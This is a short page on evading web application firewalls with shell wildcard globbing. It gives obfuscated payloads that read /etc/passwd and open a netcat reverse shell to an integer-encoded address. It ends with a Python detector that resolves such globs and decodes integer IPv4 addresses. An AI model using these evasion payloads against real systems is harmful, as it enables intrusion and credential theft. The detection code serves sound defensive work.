Evading WAF

Instead of executing the ls command, you can use the following syntax:

/???/?s

Standard: /bin/cat /etc/passwd
Evasion: /???/??t /???/??ss??

(usually nc -e /bin/bash 127.0.0.1 1337), you can do it with a syntax like:

/???/n? -e /???/b??h 2130706433 1337

If you use nc.traditional instead of an nc that doesn't have the -e parameter (needed to execute /bin/bash after connecting), the payload becomes something like this:

/???/?c.??????????? -e /???/b??h 2130706433 1337
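For the detection side, the following added example (not part of the original page) shows why these strings pass keyword-based rules and how a filter can catch them anyway: it resolves each wildcard path against a watch list, segment by segment as a shell would, and decodes integer-form IPv4 addresses. The watch list, the 0.5 wildcard ratio and the function names are assumptions made for this example.

```python
import fnmatch
import ipaddress

# Assumed watch list, built from the paths named on this page.
WATCHED = ["/bin/ls", "/bin/cat", "/bin/bash", "/bin/nc",
           "/bin/nc.traditional", "/etc/passwd"]
GLOB_CHARS = set("?*[")


def glob_match(path, pattern):
    """Match per path segment: in a shell, '?' and '*' never match '/'."""
    p_parts, g_parts = path.split("/"), pattern.split("/")
    return len(p_parts) == len(g_parts) and all(
        fnmatch.fnmatchcase(p, g) for p, g in zip(p_parts, g_parts))


def analyze(value):
    """Return (token, reason) findings for one request parameter value."""
    findings = []
    for tok in value.split():
        if tok.startswith("/") and GLOB_CHARS & set(tok):
            hits = [p for p in WATCHED if glob_match(p, tok)]
            wild_ratio = sum(c in "?*" for c in tok) / len(tok)
            if hits:
                findings.append((tok, "glob resolves to " + ",".join(hits)))
            elif wild_ratio >= 0.5:
                # No watched path matched, but the token is mostly wildcards.
                findings.append((tok, "wildcard-heavy path"))
        elif tok.isdigit() and 2**24 <= int(tok) < 2**32:
            # A bare integer in this range is a valid IPv4 address spelling.
            addr = ipaddress.IPv4Address(int(tok))
            findings.append((tok, "integer IPv4 " + str(addr)))
    return findings


if __name__ == "__main__":
    # Sample inputs taken from the strings shown on this page.
    for sample in ["/???/?s",
                   "/???/??t /???/??ss??",
                   "/???/n? -e /???/b??h 2130706433 1337",
                   "/bin/ls -la /img/*.png"]:
        print(sample, "->", analyze(sample))
```

A keyword rule looking for /bin/bash or 127.0.0.1 sees neither string in the input; matching after glob resolution and address normalization closes that gap.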
